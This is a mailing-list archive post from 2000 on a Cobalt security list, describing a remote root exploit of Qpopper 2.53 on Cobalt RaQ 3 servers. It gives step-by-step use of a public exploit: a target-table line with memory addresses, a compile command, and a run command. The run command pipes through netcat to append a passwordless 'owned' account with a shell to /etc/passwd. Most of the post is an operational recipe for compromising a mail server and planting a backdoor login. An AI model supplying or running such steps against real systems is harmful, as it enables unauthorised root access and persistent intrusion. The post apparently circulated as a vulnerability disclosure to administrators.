[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-security] Qpopper - remote root...

Subject: [cobalt-security] Qpopper - remote root...
From: Gossi The Dog <gossi@xxxxxxxxxxxxxx>
Date: Sat, 22 Jul 2000 20:00:42 +0100 (BST)

Hi,

If you want to exploit a Cobalt RaQ 3, grab the Qpopper 2.53 exploit from
http://www.hack.co.za/daem0n/pop/pop3/7350qpop.c, add the following line
to the "targets[]" structure:

	  { "Cobalt OS 5.0: qpopper-2.53", 0xBFFFD368, 0xbfffdc18 },

compile the exploit (gcc 7350qpop.c -o qpop-cobalt), and run it in the
following fashion...:

./qpop-cobalt <target-id-you-made> foobar@xxxxxxxxxxx user@xxxxxxxxxxxxx
echo owned::500:100:cracker:/:/bin/sh >>/etc/passwd 2>&1 >/dev/null | nc
sendmail-server.com 25

(user@xxxxxxxxxxxxx to, for example, gossi@xxxxxxxxxxxxxx, and
sendmail-server.com to a mail server you can send through).  You'll need
netcat installed on the box you are testing from.

That'll add a remote user (owned, no password) to the cobalt.

The attack doesn't require an account on the system - it simply needs you
to know an account on the system which 'pop3' is being used to retrieve
the mail of - I'd imagine this is a majority of accounts on Cobalts.

Regards,

-- 
gossi@xxxxxxxxxxxxxxx

Follow-Ups:
- Re: [cobalt-security] Qpopper - remote root...
  - From: Frank Cubillos

Prev by Date: [cobalt-security] unsubscript
Next by Date: Re: [cobalt-security] Qpopper - remote root...
Previous by thread: [cobalt-security] unsubscript
Next by thread: Re: [cobalt-security] Qpopper - remote root...

Sun Cobalt Security Message Index

Sun Cobalt Security Thread Index